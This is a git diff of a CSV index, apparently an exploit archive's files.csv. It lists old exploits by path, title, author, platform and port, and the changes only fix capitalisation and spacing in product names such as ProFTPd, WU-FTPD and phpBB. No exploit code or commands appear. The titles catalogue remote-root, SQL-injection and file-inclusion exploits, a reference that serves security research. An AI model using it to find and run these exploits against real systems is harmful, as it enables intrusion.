diff --git a/files.csv b/files.csv index 86052c2e6..1a07ad23d 100755 --- a/files.csv +++ b/files.csv @@ -41,11 +41,11 @@ id,file,description,date,author,platform,type,port 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 -43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) SQL Injection",2003-06-19,Spaine,linux,remote,21 +43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection",2003-06-19,Spaine,linux,remote,21 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 -47,platforms/php/webapps/47.c,"PHPBB 2.0.4 - PHP Remote File Inclusion Exploit",2003-06-30,Spoofed,php,webapps,0 +47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion Exploit",2003-06-30,Spoofed,php,webapps,0 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 @@ -72,11 +72,11 @@ id,file,description,date,author,platform,type,port 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0 -74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 +74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80 -78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 +78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 @@ -104,14 +104,14 @@ id,file,description,date,author,platform,type,port 104,platforms/linux/local/104.c,"hztty 2.0 - Privilege Escalation (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 -107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 +107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 -110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit",2003-10-13,Haggis,linux,remote,21 +110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow (SPARC version)",2003-10-27,osker178,solaris,local,0 -115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 +115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 @@ -191,7 +191,7 @@ id,file,description,date,author,platform,type,port 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 -201,platforms/multiple/remote/201.c,"wu-ftpd 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 +201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 @@ -222,17 +222,17 @@ id,file,description,date,author,platform,type,port 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7 ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 -239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 +239,platforms/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 -241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 +241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Privilege Escalation",2001-01-12,caddis,bsd,local,0 -244,platforms/linux/dos/244.java,"ProFTPD 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 +244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 @@ -322,7 +322,7 @@ id,file,description,date,author,platform,type,port 345,platforms/windows/dos/345.c,"UDP Stress Tester - Denial of Service",2002-09-10,Cys,windows,dos,0 346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0 -348,platforms/linux/remote/348.c,"wu-ftpd 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 +348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Root Exploit",2002-05-01,Teso,multiple,remote,22 350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0 @@ -346,8 +346,8 @@ id,file,description,date,author,platform,type,port 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,linux,dos,0 371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,linux,dos,0 -372,platforms/linux/remote/372.c,"OpenFTPD 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 -373,platforms/linux/remote/373.c,"OpenFTPD 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 +372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 +373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0 375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 @@ -357,7 +357,7 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 -384,platforms/php/webapps/384.txt,"PHP - (PHP-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 +384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 @@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port 391,platforms/osx/remote/391.pl,"Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd (ftpdctl) - Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143 @@ -445,7 +445,7 @@ id,file,description,date,author,platform,type,port 578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 -581,platforms/linux/remote/581.c,"ProFTPD 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 +581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 584,platforms/windows/remote/584.c,"Microsoft Windows (Windows/x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 @@ -522,7 +522,7 @@ id,file,description,date,author,platform,type,port 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 -676,platforms/php/webapps/676.c,"PHPBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 +676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 680,platforms/osx/local/680.txt,"Mac OSX Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 @@ -541,7 +541,7 @@ id,file,description,date,author,platform,type,port 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt ZIP File (PoC)",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 -697,platforms/php/webapps/697.c,"PHP 4.3.9 + PHPBB 2.x - unserialize() Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0 700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",windows,dos,0 @@ -594,7 +594,7 @@ id,file,description,date,author,platform,type,port 766,platforms/osx/local/766.c,"Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow Exploit",2005-01-24,ATmaCA,windows,local,0 -770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif'Image Parsing",2005-01-24,ATmaCA,windows,dos,0 +770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,windows,dos,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (Perl)",2005-01-25,GHC,cgi,webapps,0 @@ -664,7 +664,7 @@ id,file,description,date,author,platform,type,port 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 -842,platforms/linux/dos/842.c,"wu-ftpd 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0 +842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0 843,platforms/windows/dos/843.c,"Knet 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 @@ -683,7 +683,7 @@ id,file,description,date,author,platform,type,port 860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",cgi,webapps,0 -863,platforms/windows/local/863.cpp,"RealPlayer 10 - '.smil'Local Buffer Overflow",2005-03-07,nolimit,windows,local,0 +863,platforms/windows/local/863.cpp,"RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - (skinfile) Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,php,webapps,0 @@ -726,7 +726,7 @@ id,file,description,date,author,platform,type,port 904,platforms/linux/dos/904.c,"Linux Kernel 2.6.10 - Local Denial of Service",2005-03-29,ChoiX,linux,dos,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,windows,local,0 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 -907,platforms/php/webapps/907.pl,"PHPBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 +907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service",2005-04-03,c0d3r,windows,dos,0 909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow (3)",2005-04-12,class101,windows,remote,42 910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 @@ -741,7 +741,7 @@ id,file,description,date,author,platform,type,port 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0 -30090,platforms/php/webapps/30090.txt,"PHPPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash 3.7 - Local Buffer Overflow",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass SQL Injection",2005-04-09,LaMeR,asp,webapps,0 @@ -823,12 +823,12 @@ id,file,description,date,author,platform,type,port 1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 -1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - login.php SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 -1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 +1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 +1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps,0 -1016,platforms/php/webapps/1016.pl,"PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 -1017,platforms/php/webapps/1017.php,"PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 -1018,platforms/php/webapps/1018.php,"PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 +1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 +1017,platforms/php/webapps/1017.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 +1018,platforms/php/webapps/1018.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote Buffer Overflow Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 @@ -846,7 +846,7 @@ id,file,description,date,author,platform,type,port 1033,platforms/php/webapps/1033.pl,"Wordpress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 1034,platforms/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 -1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - login.php SQL Injection",2005-06-08,anonymous,php,webapps,0 +1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 @@ -884,7 +884,7 @@ id,file,description,date,author,platform,type,port 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 - ld.so Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 -1076,platforms/php/webapps/1076.py,"PHPBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 +1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"Wordpress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 @@ -900,7 +900,7 @@ id,file,description,date,author,platform,type,port 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service",2005-07-06,basher13,windows,dos,0 